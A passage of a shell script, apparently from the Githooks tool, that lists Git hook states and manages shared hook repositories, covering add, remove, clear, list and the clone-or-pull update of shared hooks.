    if [ -n "$(git config core.hooksPath)" ]; then
        if [ "true" != "$(git config githooks.useCoreHooksPath)" ]; then
            echo "! WARNING" >&2
            echo " \`git config core.hooksPath\` is set to $(git config core.hooksPath)," >&2
            echo " but Githooks is not configured to use that folder," >&2
            echo " which could mean the hooks in this repository are not run by Githooks" >&2
            echo >&2
        fi
    else
        if [ "true" = "$(git config githooks.useCoreHooksPath)" ]; then
            echo "! WARNING" >&2
            echo " Githooks is configured to consider \`git config core.hooksPath\`," >&2
            echo " but that git setting is not currently set," >&2
            echo " which could mean the hooks in this repository are not run by Githooks" >&2
            echo >&2
        fi
    fi
}
#####################################################
# Lists the hook files in the current
# repository along with their current state.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
# Lists the active hooks in the current repository along with their state,
# covering four sources per trigger type: a replaced non-Githooks hook,
# globally shared hooks, locally shared hooks, and repo-local hooks.
#
# Returns:
#   1 if the current directory is not a Git repo,
#   0 otherwise
list_hooks() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks list [type]
Lists the active hooks in the current repository along with their state.
If \`type\` is given, then it only lists the hooks for that trigger event.
This command needs to be run at the root of a repository.
"
        return
    fi
    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi
    check_git_hooks_setup_is_correct
    # Explicit types given: only warn about "no hooks" for those
    if [ -n "$*" ]; then
        LIST_TYPES="$*"
        WARN_NOT_FOUND="1"
    else
        LIST_TYPES="
        applypatch-msg pre-applypatch post-applypatch
        pre-commit prepare-commit-msg commit-msg post-commit
        pre-rebase post-checkout post-merge pre-push
        pre-receive update post-receive post-update
        push-to-checkout pre-auto-gc post-rewrite sendemail-validate"
    fi
    for LIST_TYPE in $LIST_TYPES; do
        LIST_OUTPUT=""
        # non-Githooks hook file
        if [ -x "${CURRENT_GIT_DIR}/hooks/${LIST_TYPE}.replaced.githook" ]; then
            ITEM_STATE=$(get_hook_state "${CURRENT_GIT_DIR}/hooks/${LIST_TYPE}.replaced.githook")
            LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (previous / file / ${ITEM_STATE})"
        fi
        # global shared hooks
        SHARED_REPOS_LIST=$(git config --global --get-all githooks.shared)
        IFS="$IFS_NEWLINE"
        for SHARED_ITEM in $(list_hooks_in_shared_repos "$LIST_TYPE"); do
            unset IFS
            if [ -d "$SHARED_ITEM" ]; then
                for LIST_ITEM in "$SHARED_ITEM"/*; do
                    ITEM_NAME=$(basename "$LIST_ITEM")
                    ITEM_STATE=$(get_hook_state "$LIST_ITEM")
                    LIST_OUTPUT="$LIST_OUTPUT
- $ITEM_NAME (${ITEM_STATE} / shared:global)"
                done
            elif [ -f "$SHARED_ITEM" ]; then
                ITEM_STATE=$(get_hook_state "$SHARED_ITEM")
                LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (file / ${ITEM_STATE} / shared:global)"
            fi
            IFS="$IFS_NEWLINE"
        done
        # local shared hooks
        if [ -f "$(pwd)/.githooks/.shared" ]; then
            SHARED_REPOS_LIST=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
            IFS="$IFS_NEWLINE"
            for SHARED_ITEM in $(list_hooks_in_shared_repos "$LIST_TYPE"); do
                unset IFS
                if [ -d "$SHARED_ITEM" ]; then
                    for LIST_ITEM in "$SHARED_ITEM"/*; do
                        ITEM_NAME=$(basename "$LIST_ITEM")
                        ITEM_STATE=$(get_hook_state "$LIST_ITEM")
                        LIST_OUTPUT="$LIST_OUTPUT
- $ITEM_NAME (${ITEM_STATE} / shared:local)"
                    done
                elif [ -f "$SHARED_ITEM" ]; then
                    ITEM_STATE=$(get_hook_state "$SHARED_ITEM")
                    LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (file / ${ITEM_STATE} / shared:local)"
                fi
                IFS="$IFS_NEWLINE"
            done
        fi
        # in the current repository
        if [ -d ".githooks/$LIST_TYPE" ]; then
            IFS="$IFS_NEWLINE"
            for LIST_ITEM in .githooks/"$LIST_TYPE"/*; do
                unset IFS
                ITEM_NAME=$(basename "$LIST_ITEM")
                ITEM_STATE=$(get_hook_state "$(pwd)/.githooks/$LIST_TYPE/$ITEM_NAME")
                LIST_OUTPUT="$LIST_OUTPUT
- $ITEM_NAME (${ITEM_STATE})"
                IFS="$IFS_NEWLINE"
            done
        elif [ -f ".githooks/$LIST_TYPE" ]; then
            ITEM_STATE=$(get_hook_state "$(pwd)/.githooks/$LIST_TYPE")
            LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (file / ${ITEM_STATE})"
        fi
        # Print accumulated results; warn only for explicitly requested types
        if [ -n "$LIST_OUTPUT" ]; then
            echo "> ${LIST_TYPE}${LIST_OUTPUT}"
        elif [ -n "$WARN_NOT_FOUND" ]; then
            echo "> $LIST_TYPE"
            echo " No active hooks found"
        fi
    done
}
#####################################################
# Returns the state of hook file
# in a human-readable format
# on the standard output.
#####################################################
# Prints the state of the hook file given as $1 in human-readable form:
# "disabled" (whole repo off), "ignored" (matches an .ignore pattern),
# "active / trusted", or the per-file enabled/disabled state.
get_hook_state() {
    if is_repository_disabled; then
        echo "disabled"
    elif is_file_ignored "$1"; then
        echo "ignored"
    elif is_trusted_repo; then
        echo "active / trusted"
    else
        get_hook_enabled_or_disabled_state "$1"
    fi
}
#####################################################
# Checks if Githooks is disabled in the
# current local repository.
#
# Returns:
# 0 if disabled, 1 otherwise
#####################################################
# Checks if Githooks is disabled in the current local repository
# via the githooks.disable config value.
#
# Returns:
#   0 if disabled, 1 otherwise
is_repository_disabled() {
    case "$(git config --get githooks.disable)" in
    true | y | Y) # "y" / "Y" are accepted for legacy installations
        return 0
        ;;
    *)
        return 1
        ;;
    esac
}
#####################################################
# Checks if the hook file at ${HOOK_PATH}
# is ignored and should not be executed.
#
# Returns:
# 0 if ignored, 1 otherwise
#####################################################
is_file_ignored() {
    HOOK_NAME=$(basename "$1")
    IS_IGNORED=""
    # Collect ignore patterns from both the repo-wide `.githooks/.ignore`
    # and the per-hook-type `.githooks/${LIST_TYPE}/.ignore` file into one
    # temporary file. NOTE(review): relies on the caller having set the
    # LIST_TYPE global to the hook type currently being processed.
    ALL_IGNORE_FILE=$(mktemp)
    if [ -f ".githooks/.ignore" ]; then
        cat ".githooks/.ignore" >"$ALL_IGNORE_FILE"
        echo >>"$ALL_IGNORE_FILE"
    fi
    if [ -f ".githooks/${LIST_TYPE}/.ignore" ]; then
        cat ".githooks/${LIST_TYPE}/.ignore" >>"$ALL_IGNORE_FILE"
        echo >>"$ALL_IGNORE_FILE"
    fi
    # Check if the filename matches any of the ignored patterns
    while IFS= read -r IGNORED; do
        # Skip blank lines and comment lines (starting with `#`).
        if [ -z "$IGNORED" ] || [ "$IGNORED" != "${IGNORED#\#}" ]; then
            continue
        fi
        # Glob-match the hook name: stripping the pattern as a prefix
        # leaves an empty string only when the whole name matches.
        if [ -z "${HOOK_NAME##$IGNORED}" ]; then
            IS_IGNORED="y"
            break
        fi
    done <"$ALL_IGNORE_FILE"
    # Remove the temporary file
    rm -f "$ALL_IGNORE_FILE"
    if [ -n "$IS_IGNORED" ]; then
        return 0
    else
        return 1
    fi
}
#####################################################
# Checks whether the current repository
# is trusted, and that this is accepted.
#
# Returns:
# 0 if the repo is trusted, 1 otherwise
#####################################################
is_trusted_repo() {
    # A repository is only trusted when it ships the trust marker file
    # AND the user has confirmed the trust in the local Git config.
    [ -f ".githooks/trust-all" ] || return 1
    TRUST_ALL_CONFIG=$(git config --local --get githooks.trust.all)
    TRUST_ALL_RESULT=$?
    # shellcheck disable=SC2181
    if [ $TRUST_ALL_RESULT -eq 0 ] && [ "$TRUST_ALL_CONFIG" = "Y" ]; then
        return 0
    fi
    return 1
}
#####################################################
# Returns the enabled or disabled state
# in human-readable format for a hook file
# passed in as the first argument.
#####################################################
get_hook_enabled_or_disabled_state() {
    HOOK_PATH="$1"
    SHA_HASH=$(get_hook_checksum "$HOOK_PATH")
    # Look up previously recorded checksums for this hook path.
    # NOTE(review): HOOK_PATH is used as a grep *pattern* here, not a
    # fixed string, so paths containing regex metacharacters may over-match.
    CURRENT_HASHES=$(grep "$HOOK_PATH" "${CURRENT_GIT_DIR}/.githooks.checksum" 2>/dev/null)
    # check against the previous hash
    if echo "$CURRENT_HASHES" | grep -q "disabled> $HOOK_PATH" >/dev/null 2>&1; then
        echo "disabled"
    elif ! echo "$CURRENT_HASHES" | grep -F -q "$SHA_HASH $HOOK_PATH" >/dev/null 2>&1; then
        # No recorded hash at all: the hook was never accepted; a
        # different recorded hash: its content changed since acceptance.
        if [ -z "$CURRENT_HASHES" ]; then
            echo "pending / new"
        else
            echo "pending / changed"
        fi
    else
        echo "active"
    fi
}
#####################################################
# List the shared hooks from the
# $INSTALL_DIR/shared directory.
#
# Returns the list of paths to the hook files
# in the shared hook repositories found locally.
#####################################################
list_hooks_in_shared_repos() {
    # Prints the path of every hook file/directory named "$1" found in
    # the configured shared hook repositories, then in any remaining
    # clones under "$INSTALL_DIR/shared" whose origin URL is still part
    # of the active $SHARED_REPOS_LIST.
    SHARED_LIST_TYPE="$1"
    ALREADY_LISTED=""
    IFS="$IFS_NEWLINE"
    for SHARED_REPO_ITEM in $SHARED_REPOS_LIST; do
        unset IFS
        set_shared_root "$SHARED_REPO_ITEM"
        # Prefer hooks under `.githooks/`, fall back to the repo root.
        if [ -e "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}" ]; then
            echo "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}"
        elif [ -e "${SHARED_ROOT}/${SHARED_LIST_TYPE}" ]; then
            echo "${SHARED_ROOT}/${SHARED_LIST_TYPE}"
        fi
        ALREADY_LISTED="$ALREADY_LISTED
${SHARED_ROOT}"
    done
    if [ ! -d "$INSTALL_DIR/shared" ]; then
        return
    fi
    IFS="$IFS_NEWLINE"
    for SHARED_ROOT in "$INSTALL_DIR/shared/"*; do
        unset IFS
        if [ ! -d "$SHARED_ROOT" ]; then
            continue
        fi
        # Skip roots already covered by the configured list above.
        if echo "$ALREADY_LISTED" | grep -F -q "$SHARED_ROOT"; then
            continue
        fi
        # Only list clones whose origin URL is still actively configured.
        REMOTE_URL=$(git -C "$SHARED_ROOT" config --get remote.origin.url)
        ACTIVE_REPO=$(echo "$SHARED_REPOS_LIST" | grep -F -o "$REMOTE_URL")
        if [ "$ACTIVE_REPO" != "$REMOTE_URL" ]; then
            continue
        fi
        if [ -e "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}" ]; then
            echo "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}"
        elif [ -e "${SHARED_ROOT}/${SHARED_LIST_TYPE}" ]; then
            # Fixed: previously referenced the unrelated LIST_TYPE global
            # here, which only worked because callers happened to pass it
            # as "$1"; use this function's own parameter consistently.
            echo "${SHARED_ROOT}/${SHARED_LIST_TYPE}"
        fi
        IFS="$IFS_NEWLINE"
    done
}
#####################################################
# Manages the shared hook repositories set either
# globally, or locally within the repository.
# Changes the \`githooks.shared\` global Git
# configuration, or the contents of the
# \`.githooks/.shared\` file in the local
# Git repository.
#
# Returns:
# 0 on success, 1 on failure (exit code)
#####################################################
manage_shared_hook_repos() {
    # Dispatches the `git hooks shared ...` subcommands.
    # Exits with 1 on failure or an unknown subcommand.
    case "$1" in
    "help")
        print_help_header
        echo "
git hooks shared [add|remove] [--shared|--local|--global] <git-url>
git hooks shared clear [--shared|--local|--global|--all]
git hooks shared purge
git hooks shared list [--shared|--local|--global|--all]
git hooks shared [update|pull]
Manages the shared hook repositories set either in the \`.githooks.shared\` file locally in the repository or
in the local or global Git configuration \`githooks.shared\`.
The \`add\` or \`remove\` subcommands adds or removes an item, given as \`git-url\` from the list.
If \`--local|--global\` is given, then the \`githooks.shared\` local/global Git configuration
is modified, or if the \`--shared\` option (default) is set, the \`.githooks/.shared\`
file is modified in the local repository.
The \`clear\` subcommand deletes every item on either the global or the local list,
or both when the \`--all\` option is given.
The \`purge\` subcommand deletes the shared hook repositories already pulled locally.
The \`list\` subcommand list the shared, local, global or all (default) shared hooks repositories.
The \`update\` or \`pull\` subcommands update all the shared repositories, either by
running \`git pull\` on existing ones or \`git clone\` on new ones.
"
        return
        ;;
    "update" | "pull")
        update_shared_hook_repos
        return
        ;;
    "clear")
        shift
        clear_shared_hook_repos "$@"
        return
        ;;
    "purge")
        # Best-effort delete of all locally pulled shared repositories.
        [ -w "$INSTALL_DIR/shared" ] &&
            rm -rf "$INSTALL_DIR/shared" &&
            echo "All existing shared hook repositories have been deleted locally" &&
            return
        echo "! Cannot delete existing shared hook repositories locally (maybe there is none)" >&2
        exit 1
        ;;
    "list")
        shift
        list_shared_hook_repos "$@"
        return
        ;;
    "add")
        shift
        add_shared_hook_repo "$@"
        return
        ;;
    "remove")
        shift
        remove_shared_hook_repo "$@"
        return
        ;;
    *)
        echo "! Unknown subcommand: \`$1\`" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Adds the URL of a new shared hook repository to
# the global or local list.
#####################################################
add_shared_hook_repo() {
    # Adds the given <git-url> to the selected shared hooks list: the
    # local/global Git config (`--local`/`--global`) or the repository's
    # `.githooks/.shared` file (`--shared`, the default).
    SET_SHARED_TYPE="--shared"
    SHARED_REPO_URL=
    if echo "$1" | grep -qE "\-\-(shared|local|global)"; then
        SET_SHARED_TYPE="$1"
        SHARED_REPO_URL="$2"
    else
        SHARED_REPO_URL="$1"
    fi
    if [ -z "$SHARED_REPO_URL" ]; then
        echo "! Usage: \`git hooks shared add [--shared|--local|--global] <git-url>\`" >&2
        exit 1
    fi
    if [ "$SET_SHARED_TYPE" != "--shared" ]; then
        # `--local` needs a repository; `--global` works anywhere.
        if [ "$SET_SHARED_TYPE" = "--local" ] && ! is_running_in_git_repo_root; then
            echo "! The current directory \`$(pwd)\` does not" >&2
            echo " seem to be the root of a Git repository!" >&2
            exit 1
        fi
        git config "$SET_SHARED_TYPE" --add githooks.shared "$SHARED_REPO_URL" &&
            echo "The new shared hook repository is successfully added" &&
            return
        echo "! Failed to add the new shared hook repository" >&2
        exit 1
    else
        if ! is_running_in_git_repo_root; then
            echo "! The current directory \`$(pwd)\` does not" >&2
            echo " seem to be the root of a Git repository!" >&2
            exit 1
        fi
        # Local paths are rejected for `.githooks/.shared` because the
        # file is committed and shared between machines.
        if is_local_path "$SHARED_REPO_URL" ||
            is_local_url "$SHARED_REPO_URL"; then
            echo "! Adding a local path:" >&2
            echo " \`$SHARED_REPO_URL\`" >&2
            echo " to the local shared hooks is forbidden." >&2
            exit 1
        fi
        mkdir -p "$(pwd)/.githooks"
        # Separate from previous content with a blank line (only when the
        # file already exists), then append a dated comment and the URL.
        [ -f "$(pwd)/.githooks/.shared" ] &&
            echo "" >>"$(pwd)/.githooks/.shared"
        echo "# Added on $(date)" >>"$(pwd)/.githooks/.shared" &&
            echo "$SHARED_REPO_URL" >>"$(pwd)/.githooks/.shared" &&
            echo "The new shared hook repository is successfully added" &&
            echo_if_non_bare_repo " Do not forget to commit the change!" &&
            return
        echo "! Failed to add the new shared hook repository" >&2
        exit 1
    fi
}
#####################################################
# Removes the URL of a new shared hook repository to
# the global or local list.
#####################################################
remove_shared_hook_repo() {
    # Removes the given <git-url> from the selected shared hooks list:
    # the local/global Git config (`--local`/`--global`) or the
    # repository's `.githooks/.shared` file (`--shared`, the default).
    SET_SHARED_TYPE="--shared"
    SHARED_REPO_URL=
    if echo "$1" | grep -qE "\-\-(shared|local|global)"; then
        SET_SHARED_TYPE="$1"
        SHARED_REPO_URL="$2"
    else
        SHARED_REPO_URL="$1"
    fi
    if [ -z "$SHARED_REPO_URL" ]; then
        echo "! Usage: \`git hooks shared remove [--shared|--local|--global] <git-url>\`" >&2
        exit 1
    fi
    if [ "$SET_SHARED_TYPE" != "--shared" ]; then
        if [ "$SET_SHARED_TYPE" = "--local" ] && ! is_running_in_git_repo_root; then
            echo "! The current directory \`$(pwd)\` does not" >&2
            echo " seem to be the root of a Git repository!" >&2
            exit 1
        fi
        CURRENT_LIST=$(git config "$SET_SHARED_TYPE" --get-all githooks.shared)
        # Unset all and add them back
        git config "$SET_SHARED_TYPE" --unset-all githooks.shared
        IFS="$IFS_NEWLINE"
        for SHARED_REPO_ITEM in $CURRENT_LIST; do
            unset IFS
            # Re-add every entry except the one being removed.
            if [ "$SHARED_REPO_ITEM" = "$SHARED_REPO_URL" ]; then
                continue
            fi
            git config "$SET_SHARED_TYPE" --add githooks.shared "$SHARED_REPO_ITEM"
            IFS="$IFS_NEWLINE"
        done
        unset IFS
        echo "The list of shared hook repositories is successfully changed"
        return
    else
        if ! is_running_in_git_repo_root; then
            echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
            exit 1
        fi
        if [ ! -f "$(pwd)/.githooks/.shared" ]; then
            echo "! No \`.githooks/.shared\` in current repository" >&2
            return
        fi
        # Rebuild the file line by line, dropping the matching URL while
        # keeping comments and other entries in their original order.
        NEW_LIST=""
        ONLY_COMMENTS="true"
        IFS="$IFS_NEWLINE"
        while read -r LINE || [ -n "$LINE" ]; do
            unset IFS
            # An entry line is non-empty and starts with neither `#`
            # nor a space.
            if echo "$LINE" | grep -qE "^[^#\n\r ].*$"; then
                if [ "$LINE" = "$SHARED_REPO_URL" ]; then
                    continue
                fi
                ONLY_COMMENTS="false"
            elif echo "$LINE" | grep -qE "^ *[#].*$"; then
                : # nothing to do for comments ...
            else
                : # skip empty lines
            fi
            if [ -z "$NEW_LIST" ]; then
                NEW_LIST="$LINE"
            else
                NEW_LIST="${NEW_LIST}
${LINE}"
            fi
            IFS="$IFS_NEWLINE"
        done <"$(pwd)/.githooks/.shared"
        unset IFS
        # If nothing but comments (or nothing at all) remains, clear the
        # file entirely instead of writing back comment-only content.
        if [ -z "$NEW_LIST" ] || [ "$ONLY_COMMENTS" = "true" ]; then
            clear_shared_hook_repos "$SET_SHARED_TYPE" && return || exit 1
        fi
        echo "$NEW_LIST" >"$(pwd)/.githooks/.shared" &&
            echo "The list of shared hook repositories is successfully changed" &&
            echo_if_non_bare_repo " Do not forget to commit the change!" &&
            return
        echo "! Failed to remove a shared hook repository" >&2
        exit 1
    fi
}
#####################################################
# Clears the list of shared hook repositories
# from the global or local list, or both.
#####################################################
clear_shared_hook_repos() {
    # Clears the shared hook repository list(s) selected by "$1":
    # `--shared` (the `.githooks/.shared` file), `--local` / `--global`
    # (Git config), or `--all` for every one of them.
    # Exits with 1 on bad usage or when any clear operation failed.
    CLEAR_GLOBAL_REPOS=""
    CLEAR_LOCAL_REPOS=""
    CLEAR_SHARED_REPOS=""
    CLEAR_REPOS_FAILED=""
    case "$1" in
    "--shared")
        CLEAR_SHARED_REPOS=1
        ;;
    "--local")
        CLEAR_LOCAL_REPOS=1
        ;;
    "--global")
        CLEAR_GLOBAL_REPOS=1
        ;;
    "--all")
        CLEAR_SHARED_REPOS=1
        CLEAR_LOCAL_REPOS=1
        CLEAR_GLOBAL_REPOS=1
        ;;
    *)
        echo "! Unknown clear option \`$1\`" >&2
        echo " Usage: \`git hooks shared clear [--shared|--local|--global|--all]\`" >&2
        exit 1
        ;;
    esac
    if [ -n "$CLEAR_LOCAL_REPOS" ]; then
        # The local config can only be cleared from inside a repository.
        if ! is_running_in_git_repo_root; then
            echo "! The current directory \`$(pwd)\` does not" >&2
            echo " seem to be the root of a Git repository!" >&2
            CLEAR_REPOS_FAILED=1
        else
            git config --local --unset-all githooks.shared
            echo "Shared hook repository list in local Git config cleared"
        fi
    fi
    if [ -n "$CLEAR_GLOBAL_REPOS" ]; then
        git config --global --unset-all githooks.shared
        echo "Shared hook repository list in global Git config cleared"
    fi
    if [ -n "$CLEAR_SHARED_REPOS" ] && [ -f "$(pwd)/.githooks/.shared" ]; then
        rm -f "$(pwd)/.githooks/.shared" &&
            echo "Shared hook repository list in \`.githooks/.shared\` file cleared" ||
            CLEAR_REPOS_FAILED=1
    fi
    if [ -n "$CLEAR_REPOS_FAILED" ]; then
        echo "! There were some problems clearing the shared hook repository list" >&2
        exit 1
    fi
}
#####################################################
# Prints the list of shared hook repositories,
# along with their Git URLs optionally, from
# the global or local list, or both.
#####################################################
list_shared_hook_repos() {
    # Lists shared hook repositories from the local and/or global Git
    # config and/or the repo's `.githooks/.shared` file, annotating each
    # entry as active, pending (not yet cloned) or invalid.
    LIST_SHARED=1
    LIST_CONFIGS="global,local"
    for ARG in "$@"; do
        case "$ARG" in
        "--shared")
            LIST_CONFIGS=""
            ;;
        "--local")
            LIST_CONFIGS="local"
            LIST_SHARED=""
            ;;
        "--global")
            LIST_CONFIGS="global"
            LIST_SHARED=""
            ;;
        "--all") ;;
        *)
            echo "! Unknown list option \`$ARG\`" >&2
            echo " Usage: \`git hooks shared list [--shared|--local|--global|--all]\`" >&2
            exit 1
            ;;
        esac
    done
    IFS=","
    for LIST_CONFIG in $LIST_CONFIGS; do
        unset IFS
        echo "Shared hook repositories in $LIST_CONFIG Git config:"
        SHARED_REPOS_LIST=$(git config "--$LIST_CONFIG" --get-all githooks.shared)
        if [ -z "$SHARED_REPOS_LIST" ]; then
            echo " - None"
        else
            IFS="$IFS_NEWLINE"
            for LIST_ITEM in $SHARED_REPOS_LIST; do
                unset IFS
                set_shared_root "$LIST_ITEM"
                LIST_ITEM_STATE="invalid"
                # Cloned entries are "active" only when the clone exists
                # and its origin still matches; existing-but-uncloned
                # entries are "pending". Non-cloned (local path) entries
                # just need the directory to exist.
                if [ "$SHARED_REPO_IS_CLONED" = "true" ]; then
                    if [ -d "$SHARED_ROOT" ]; then
                        if [ "$(git -C "$SHARED_ROOT" config --get remote.origin.url)" = "$SHARED_REPO_CLONE_URL" ]; then
                            LIST_ITEM_STATE="active"
                        fi
                    else
                        LIST_ITEM_STATE="pending"
                    fi
                else
                    [ -d "$SHARED_ROOT" ] && LIST_ITEM_STATE="active"
                fi
                echo " - $LIST_ITEM ($LIST_ITEM_STATE)"
                IFS="$IFS_NEWLINE"
            done
            unset IFS
        fi
        IFS=","
    done
    unset IFS
    if [ -n "$LIST_SHARED" ]; then
        echo "Shared hook repositories in \`.githooks/.shared\`:"
        if ! is_running_in_git_repo_root; then
            echo " - Current folder does not seem to be a Git repository"
            # Only a hard error when the file was the sole source requested.
            [ -z "$LIST_CONFIGS" ] && exit 1
        elif [ ! -f "$(pwd)/.githooks/.shared" ]; then
            echo " - None"
        else
            # Entries are non-empty lines not starting with `#` or a space.
            SHARED_REPOS_LIST=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
            IFS="$IFS_NEWLINE"
            for LIST_ITEM in $SHARED_REPOS_LIST; do
                unset IFS
                set_shared_root "$LIST_ITEM"
                LIST_ITEM_STATE="invalid"
                if [ "$SHARED_REPO_IS_CLONED" != "true" ]; then
                    [ -d "$SHARED_ROOT" ] && LIST_ITEM_STATE="active"
                else
                    if [ -d "$SHARED_ROOT" ]; then
                        if [ "$(git -C "$SHARED_ROOT" config --get remote.origin.url)" = "$SHARED_REPO_CLONE_URL" ]; then
                            LIST_ITEM_STATE="active"
                        fi
                    else
                        LIST_ITEM_STATE="pending"
                    fi
                fi
                echo " - $LIST_ITEM ($LIST_ITEM_STATE)"
                IFS="$IFS_NEWLINE"
            done
            unset IFS
        fi
    fi
}
#####################################################
# Updates the configured shared hook repositories.
#
# Returns:
# None
#####################################################
update_shared_hook_repos() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks shared pull
Updates the shared repositories found either
in the global Git configuration, or in the
\`.githooks/.shared\` file in the local repository.
> Please use \`git hooks shared pull\` instead, this version is now deprecated.
"
        return
    fi
    # Update from all three sources in turn: the repo's
    # `.githooks/.shared` file, the local and the global Git config.
    if [ -f "$(pwd)/.githooks/.shared" ]; then
        # Entries are non-empty lines not starting with `#` or a space.
        SHARED_HOOKS=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
        update_shared_hooks_in --shared "$SHARED_HOOKS"
    fi
    SHARED_HOOKS=$(git config --local --get-all githooks.shared 2>/dev/null)
    if [ -n "$SHARED_HOOKS" ]; then
        update_shared_hooks_in --local "$SHARED_HOOKS"
    fi
    SHARED_HOOKS=$(git config --global --get-all githooks.shared)
    if [ -n "$SHARED_HOOKS" ]; then
        update_shared_hooks_in --global "$SHARED_HOOKS"
    fi
    echo "Finished"
}
#####################################################
# Check if `$1` is not a supported git clone url and
# is treated as a local path to a repository.
# See `https://tools.ietf.org/html/rfc3986#appendix-B`
# Returns: 0 if it is a local path, 1 otherwise
#####################################################
is_local_path() {
    # "$1" counts as a local path when it is neither a scheme URL
    # (`<scheme>://...`) nor a short scp-style reference (`user@host:path`).
    # See `https://tools.ietf.org/html/rfc3986#appendix-B`.
    if echo "$1" | grep -Eq "^[^:/?#]+://"; then
        return 1 # its a URL `<scheme>://...`
    fi
    if echo "$1" | grep -Eq "^.+@.+:.+"; then
        return 1 # or its a short scp syntax
    fi
    return 0
}
#####################################################
# Check if url `$1`is a local url, e.g `file://`.
#
# Returns: 0 if it is a local url, 1 otherwise
#####################################################
is_local_url() {
    # A local URL starts (after optional whitespace) with `file://`,
    # matched case-insensitively.
    echo "$1" | grep -iEq "^\s*file://" && return 0
    return 1
}
#####################################################
# Sets the `SHARED_ROOT` and `NORMALIZED_NAME`
# for the shared hook repo url `$1` and sets
# `SHARED_REPO_IS_CLONED` to `true` and its
# `SHARED_REPO_CLONE_URL` if is needs to get
# cloned and `SHARED_REPO_IS_LOCAL` to `true`
# if `$1` points to to a local path.
#
# Returns:
# none
#####################################################
set_shared_root() {
    SHARED_ROOT=""
    SHARED_REPO_CLONE_URL=""
    SHARED_REPO_CLONE_BRANCH=""
    SHARED_REPO_IS_LOCAL="false"
    SHARED_REPO_IS_CLONED="true"
    DO_SPLIT="true"
    if is_local_path "$1"; then
        SHARED_REPO_IS_LOCAL="true"
        if is_bare_repo "$1"; then
            # A local bare repo is still cloned like a URL, but its path
            # must not be split at an `@` below.
            DO_SPLIT="false"
        else
            # We have a local path to a non-bare repo
            SHARED_REPO_IS_CLONED="false"
            SHARED_ROOT="$1"
            return
        fi
    elif is_local_url "$1"; then
        SHARED_REPO_IS_LOCAL="true"
    fi
    if [ "$SHARED_REPO_IS_CLONED" = "true" ]; then
        # Here we now have a supported Git URL or
        # a local bare-repo `<localpath>`
        # Split "...@(.*)" into the clone URL and a branch name.
        if [ "$DO_SPLIT" = "true" ] && echo "$1" | grep -q "@"; then
            SHARED_REPO_CLONE_URL="$(echo "$1" | sed -E "s|^(.+)@.+$|\\1|")"
            SHARED_REPO_CLONE_BRANCH="$(echo "$1" | sed -E "s|^.+@(.+)$|\\1|")"
        else
            SHARED_REPO_CLONE_URL="$1"
            SHARED_REPO_CLONE_BRANCH=""
        fi
        # Double-check what we did above
        if echo "$SHARED_REPO_CLONE_BRANCH" | grep -q ":"; then
            # the branch name had a ":" so it was probably not a branch name
            SHARED_REPO_CLONE_URL="${SHARED_REPO_CLONE_URL}@${SHARED_REPO_CLONE_BRANCH}"
            SHARED_REPO_CLONE_BRANCH=""
        elif echo "$SHARED_REPO_CLONE_URL" | grep -qE ".*://[^/]+$"; then
            # the clone URL is something starting with a protocol then no path parts, then we probably split at the wrong place
            SHARED_REPO_CLONE_URL="${SHARED_REPO_CLONE_URL}@${SHARED_REPO_CLONE_BRANCH}"
            SHARED_REPO_CLONE_BRANCH=""
        fi
        # Define the shared clone folder
        # The name combines a hash of the raw entry with a sanitized tail
        # of the entry for human readability.
        SHA_HASH=$(echo "$1" | git hash-object --stdin 2>/dev/null)
        NAME=$(echo "$1" | tail -c 48 | sed -E "s/[^a-zA-Z0-9]/-/g")
        SHARED_ROOT="$INSTALL_DIR/shared/$SHA_HASH-$NAME"
    fi
}
#####################################################
# Updates the shared hooks repositories
# on the list passed in on the first argument.
#####################################################
update_shared_hooks_in() {
    # Clones or pulls every shared hook repository in the list "$2";
    # "$1" says where the list came from (--shared|--local|--global).
    SHARED_HOOKS_TYPE="$1"
    SHARED_REPOS_LIST="$2"
    IFS="$IFS_NEWLINE"
    for SHARED_REPO in $SHARED_REPOS_LIST; do
        unset IFS
        set_shared_root "$SHARED_REPO"
        if [ "$SHARED_REPO_IS_CLONED" != "true" ]; then
            # Non-cloned roots are ignored
            continue
        elif [ "$SHARED_HOOKS_TYPE" = "--shared" ] &&
            [ "$SHARED_REPO_IS_LOCAL" = "true" ]; then
            # Local paths in the committed `.shared` file are skipped.
            echo "! Warning: Shared hooks in \`.githooks/.shared\` contain a local path" >&2
            echo " \`$SHARED_REPO\`" >&2
            echo " which is forbidden. It will be skipped." >&2
            echo ""
            echo " You can only have local paths for shared hooks defined" >&2
            echo " in the local or global Git configuration." >&2
            echo ""
            echo " This can be achieved by running" >&2
            echo " \$ git hooks shared add [--local|--global] \"$SHARED_REPO\"" >&2
            echo " and deleting it from the \`.shared\` file by" >&2
            echo " \$ git hooks shared remove --shared \"$SHARED_REPO\"" >&2
            continue
        fi
        if [ -d "$SHARED_ROOT/.git" ]; then
            # Existing clone: just pull; failures are reported but do not
            # abort the remaining updates.
            echo "* Updating shared hooks from: $SHARED_REPO"
            # shellcheck disable=SC2086
            PULL_OUTPUT="$(execute_git "$SHARED_ROOT" pull 2>&1)"
            # shellcheck disable=SC2181
            if [ $? -ne 0 ]; then
                echo "! Update failed, git pull output:" >&2
                echo "$PULL_OUTPUT" >&2
            fi
        else
            echo "* Retrieving shared hooks from: $SHARED_REPO_CLONE_URL"
            # Remote repos are shallow-cloned; local (bare) repos fully.
            ADD_ARGS=""
            [ "$SHARED_REPO_IS_LOCAL" != "true" ] && ADD_ARGS="--depth=1"
            # Start from a clean, empty target directory.
